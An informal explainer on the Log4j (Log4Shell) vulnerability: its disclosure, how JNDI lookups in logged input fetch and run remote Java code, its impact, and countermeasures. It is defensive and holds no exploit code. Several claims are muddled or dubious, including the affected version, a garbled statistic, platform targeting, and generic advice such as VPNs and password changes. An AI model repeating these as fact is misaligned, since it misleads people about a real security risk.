The LOG4J security breach also referred to as (log4jshell). Log4j is created by the Apache Software Foundation. Log4j is a widely used java-based piece of open-source library that is used by software developers on software like Minecraft, amazon, apple, twitter, and many more. It is used to monitor and track their applications which makes it implementation used by millions of devices and servers all over the world.
What is LOG4J Vulnerability
Log4j vulnerability or log4jshell is one of the biggest security vulnerability we have had over the past 10 years 2012-2022 according to CISA Director Jen Easterly.
Log4j vulnerability is not a virus, it’s a simple data logging tool that is used on a lot of software. The vulnerability in the log4j code allowed hackers to exploit and have an open door into the network. Due to the use of this open-source library all over the world in several of servers, it’s a major cause for concern for end users and organization. The effect of this vulnerability has cut across all sectors from government, organization and even individuals. Unlike most vulnerabilities that are system specific log4j is targeted at windows, Linux, apple and iOS users.
Attack Technique
According to CrowdStrike there is an 84% fear of this been the biggest threat in the next 3years.
This is a vulnerability that was found out on November 24, 2021 but wasn’t published immediately. On December 10 2021, Apache Software Foundation publicly announced the vulnerability in log4j, that was when the attack began to ramp up. Log4j v2.15 has a weakness in the configuration that allows attacker take advantage of whatever application or website that log4j is used on. This vulnerability is given a severity score of 10 and classified as a remote code execution vulnerability. When a message is stored in log4j it can reach out to an outside destination/server that is run by a hacker, the hacker then uses that connection to pass arbitrary command back to the server and carry out malicious activities. Log4j allows lookup to appear in log message i.e whenever a user input is logged, that user input contained a JNDI lookup to some malicious threat actor endpoint then log4j would still resolve to that lookup, it could connect to the malicious server and download some java code from that server afterwards that code could be executed. The attack is carried out through remote code execution. It is a high sophisticated exploit because it does not require great technical knowledge as script kidders and even curious users can execute it but the severity level is very high.
Impact of the attack
The security vulnerability within log4j grants hackers the ability to bypass any form of restrictions and gain unauthorized access to system and resources without any password. This hacker once he gets into the system could carry out malicious activities like install spy software, steal information, sensitive data like Customer data, passwords, intellectual property, corporate strategies. The attackers once they login to the system they can deploy ransomware, nation-states targeting corporation, this vulnerability can lead to a supply chain of people who you do business with to ingress into your environment. The attacker are infiltrating companies installing crypto miners and increasing their privileged access.
Countermeasures against log4j vulnerability
There isn’t a lot you can do to prevent yourself or organization from this exploit because most of the software been used are running with log4j library, but here are a few steps to protect yourself:
If there’s a notification update from a program, make sure you update, because it might be security fix to log4j or other vulnerabilities.
Always remember to change your password frequently.
Use of two factor authentication.
Use of VPN.
Update and patch to the most recent version of Apache, log4j, java to get rid of the security risk.
Turn LDAP off: LDAP is used to reference outside command that attacker use to pass command.